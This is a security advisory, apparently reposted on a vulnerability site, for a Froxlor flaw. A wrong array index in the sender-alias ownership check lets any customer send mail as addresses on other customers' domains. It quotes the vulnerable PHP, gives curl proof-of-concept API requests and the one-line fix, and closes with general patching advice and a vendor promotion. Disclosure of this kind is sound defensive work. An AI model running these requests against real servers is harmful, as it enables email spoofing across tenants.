In EmailSender::add(), the domain ownership validation for full email sender aliases uses the wrong array index when splitting the email address, passing the local part instead of the domain to validateLocalDomainOwnership(). This causes the ownership check to always pass for non-existent "domains," allowing any authenticated customer to add sender aliases for email addresses on domains belonging to other customers. Postfix's sender_login_maps then authorizes the attacker to send emails as those addresses.
In lib/Froxlor/Api/Commands/EmailSender.php at line 100, when a customer adds a full email address (not a @domain wildcard) as an allowed sender, the code splits on @ and takes index [0]:
// Line 96-106
if (substr($allowed_sender, 0, 1) != '@') {
if (!Validate::validateEmail($idna_convert->encode($allowed_sender))) {
Response::standardError('emailiswrong', $allowed_sender, true);
}
self::validateLocalDomainOwnership(explode("@", $allowed_sender)[0] ?? ""); // BUG: [0] is the local part
} else {
if (!Validate::validateDomain($idna_convert->encode(substr($allowed_sender, 1)))) {
Response::standardError('wildcardemailiswrong', substr($allowed_sender, 1), true);
}
self::validateLocalDomainOwnership(substr($allowed_sender, 1)); // CORRECT: passes domain
}
For input [email protected], explode("@", "[email protected]") returns ["admin", "domain-b.com"]. Index [0] is "admin" — the local part, not the domain.
The validateLocalDomainOwnership() function (lines 346-355) then queries panel_domains for a domain matching "admin":
private static function validateLocalDomainOwnership(string $domain): void
{
$sel_stmt = Database::prepare("SELECT customerid FROM `" . TABLE_PANEL_DOMAINS . "` WHERE `domain` = :domain");
$domain_result = Database::pexecute_first($sel_stmt, ['domain' => $domain]);
if ($domain_result && $domain_result['customerid'] != CurrentUser::getField('customerid')) {
Response::standardError('senderdomainnotowned', $domain, true);
}
}
Since no domain named "admin" exists in panel_domains, $domain_result is false, and the function returns without error — the ownership check silently passes.
The inserted mail_sender_aliases row is then picked up by Postfix's sender_login_maps query (configured in mysql-virtual_sender_permissions.cf):
... UNION (SELECT mail_sender_aliases.email FROM mail_sender_aliases
WHERE mail_sender_aliases.allowed_sender = '%s') ...
This query maps the allowed_sender back to the mail user, authorizing them to send as that address via SMTP.
# Prerequisites: Froxlor instance with mail.enable_allow_sender enabled,
# two customers: Customer A (owns domain-a.com) and Customer B (owns domain-b.com)
# Step 1: As Customer A, add a sender alias claiming Customer B's domain
# Via API:
curl -X POST 'https://froxlor-host/api/v1/' \
-H 'Authorization: Basic <customer-A-credentials>' \
-H 'Content-Type: application/json' \
-d '{
"command": "EmailSender.add",
"params": {
"emailaddr": "[email protected]",
"allowed_sender": "[email protected]"
}
}'
# Expected: Error "senderdomainnotowned" because domain-b.com belongs to Customer B
# Actual: 200 OK — alias is created because validateLocalDomainOwnership
# receives "ceo" (local part) instead of "domain-b.com" (domain)
# Step 2: Verify the alias was inserted
curl -X POST 'https://froxlor-host/api/v1/' \
-H 'Authorization: Basic <customer-A-credentials>' \
-H 'Content-Type: application/json' \
-d '{
"command": "EmailSender.listing",
"params": {"emailaddr": "[email protected]"}
}'
# Step 3: Customer A can now send email as [email protected] via SMTP
# because Postfix sender_login_maps will match the mail_sender_aliases entry
# and authorize Customer A's mail account to use that sender address.
The same attack works via the web UI by POST-ing to customer_email.php with action=add_sender and the target domain in allowed_domain.
Any authenticated customer on a multi-tenant Froxlor instance can add sender aliases for email addresses on domains belonging to other customers. This allows:
smtpd_sender_login_maps restriction that is specifically designed to prevent this.validateLocalDomainOwnership) is the only barrier preventing cross-customer sender aliasing, and it is completely ineffective for full email addresses.Note: The wildcard (@domain) code path at line 105 is not affected — it correctly passes the domain to validateLocalDomainOwnership().
Change index [0] to [1] on line 100 of lib/Froxlor/Api/Commands/EmailSender.php:
// Before (line 100):
self::validateLocalDomainOwnership(explode("@", $allowed_sender)[0] ?? "");
// After:
self::validateLocalDomainOwnership(explode("@", $allowed_sender)[1] ?? "");
This ensures the domain part of the email address is passed to the ownership validation, matching the behavior of the wildcard path on line 105.
| Software | From | Fixed in |
|---|---|---|
froxlor / froxlor
|
- | 2.3.6 |
A security vulnerability is a weakness in software, hardware, or configuration that can be exploited to compromise confidentiality, integrity, or availability. Many vulnerabilities are tracked as CVEs (Common Vulnerabilities and Exposures), which provide a standardized identifier so teams can coordinate patching, mitigation, and risk assessment across tools and vendors.
CVSS (Common Vulnerability Scoring System) estimates technical severity, but it doesn't automatically equal business risk. Prioritize using context like internet exposure, affected asset criticality, known exploitation (proof-of-concept or in-the-wild), and whether compensating controls exist. A "Medium" CVSS on an exposed, production system can be more urgent than a "Critical" on an isolated, non-production host.
A vulnerability is the underlying weakness. An exploit is the method or code used to take advantage of it. A zero-day is a vulnerability that is unknown to the vendor or has no publicly available fix when attackers begin using it. In practice, risk increases sharply when exploitation becomes reliable or widespread.
Recurring findings usually come from incomplete Asset Discovery, inconsistent patch management, inherited images, and configuration drift. In modern environments, you also need to watch the software supply chain: dependencies, containers, build pipelines, and third-party services can reintroduce the same weakness even after you patch a single host. Unknown or unmanaged assets (often called Shadow IT) are a common reason the same issues resurface.
Use a simple, repeatable triage model: focus first on externally exposed assets, high-value systems (identity, VPN, email, production), vulnerabilities with known exploits, and issues that enable remote code execution or privilege escalation. Then enforce patch SLAs and track progress using consistent metrics so remediation is steady, not reactive.
SynScan combines attack surface monitoring and continuous security auditing to keep your inventory current, flag high-impact vulnerabilities early, and help you turn raw findings into a practical remediation plan.